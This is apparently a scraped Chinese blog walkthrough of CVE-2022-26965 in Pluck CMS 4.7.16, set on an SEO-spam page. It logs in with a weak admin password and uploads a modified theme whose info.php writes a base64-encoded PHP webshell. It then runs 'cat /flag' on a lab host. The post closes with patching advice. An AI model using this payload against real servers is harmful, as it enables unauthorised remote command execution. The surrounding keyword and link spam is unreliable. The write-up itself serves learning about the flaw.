当前位置: 首页 > news >正文

免费建设公司网站广州网站seo

免费建设公司网站,广州网站seo,从零开始做电影网站,怎么做网站的优化排名简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.zhongyajixie.com/news/38376.html

相关文章:

  • 网站建设案例讯息兰州seo优化公司
  • 怎么给网站做关键词淘宝客怎么做推广
  • 怎么访问域名网站石家庄网络关键词排名
  • 苏州网站建设极简幕枫视频号链接怎么获取
  • 电商网站建设讯息竞价推广哪家公司好
  • 政府网站建设 强化考评问责北京网站sem、seo
  • 网站费用怎么做帐百度指数在线查询工具
  • 邢台网站制作地址网络营销和电子商务区别
  • 自助旅游网站开发分析报告电商运营seo
  • 做网站咋做站长统计官方网站
  • 国外永久免费crm系统淘宝标题优化网站
  • 小学学校网站模板湖南正规关键词优化
  • 完美政府网站模版全渠道营销的概念
  • 传统纸媒公司网站建设需求营销策划公司靠谱吗
  • 网站建设诚信服务互联网下的网络营销
  • 网站上的支付接口怎么做如何找做网站的公司
  • 门户网站开发用什么框架好德阳seo优化
  • [8dvd]flash网站源文件 flash整站源码做一个电商平台大概需要多少钱
  • 做网站怎样实现网上支付短视频seo排名系统
  • 食品网站的功能定位衡水网站优化推广
  • 做网站界面设计大小百度seo搜索排名
  • 网站建设制作要学什么seo内容优化是什么意思
  • 九寨沟网站开发的背景打开网址资料网站
  • 政府新闻网站建设方案杭州seo博客有哪些
  • 如何使用电子商务网站品牌设计公司
  • 网站如何做谷歌推广电子商务营销策略
  • 淘宝做任务网站全国疫情最新情况
  • 注册深圳公司条件江北关键词优化排名seo
  • 手机网站程序下载如何宣传推广
  • 帮网站做推广赚钱2023广东又开始疫情了吗